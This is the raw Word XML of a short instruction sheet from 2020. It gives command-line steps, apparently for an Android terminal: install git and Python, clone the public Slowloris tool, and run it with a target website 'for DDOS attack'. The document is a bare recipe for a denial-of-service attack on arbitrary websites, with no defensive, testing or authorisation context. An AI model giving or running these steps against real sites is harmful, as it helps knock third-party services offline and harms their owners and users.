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A099" w14:textId="5256022F" w:rsidR="00CC1332" w:rsidRDefault="00CC1332">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC1332">
        <w:t>pkg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC1332">
        <w:t xml:space="preserve"> install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC1332">
        <w:t>git</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="489EA150" w14:textId="521F1D8B" w:rsidR="00126C48" w:rsidRDefault="00126C48">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00126C48">
        <w:t>pkg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00126C48">
        <w:t xml:space="preserve"> install python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6B4AB8" w14:textId="590271F3" w:rsidR="00380FB6" w:rsidRDefault="00D86AF3">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86AF3">
        <w:t>git</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86AF3">
        <w:t xml:space="preserve"> clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="001C48CB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/gkbrk/slowloris</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4DDA4B6C" w14:textId="27270DE8" w:rsidR="00380FB6" w:rsidRDefault="00380FB6">
      <w:r w:rsidRPr="00380FB6">
        <w:t xml:space="preserve">cd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00380FB6">
        <w:t>slowloris</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F313BB1" w14:textId="07100ADB" w:rsidR="00D86AF3" w:rsidRDefault="00EC6EA9">
      <w:r w:rsidRPr="00EC6EA9">
        <w:t xml:space="preserve">python </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC6EA9">
        <w:t>slowloris.p</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A4254C">
        <w:t>(enter the name of website for DDOS attack)</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D8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2"/>
    <w:rsid w:val="00126C48"/>
    <w:rsid w:val="00380FB6"/>
    <w:rsid w:val="009437D2"/>
    <w:rsid w:val="00A4254C"/>
    <w:rsid w:val="00CC1332"/>
    <w:rsid w:val="00D86AF3"/>
    <w:rsid w:val="00E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D7F0A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F38FE831-F8AF-BE47-B001-71AEE52E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gkbrk/slowlor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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-10-06T21:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-06T21:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>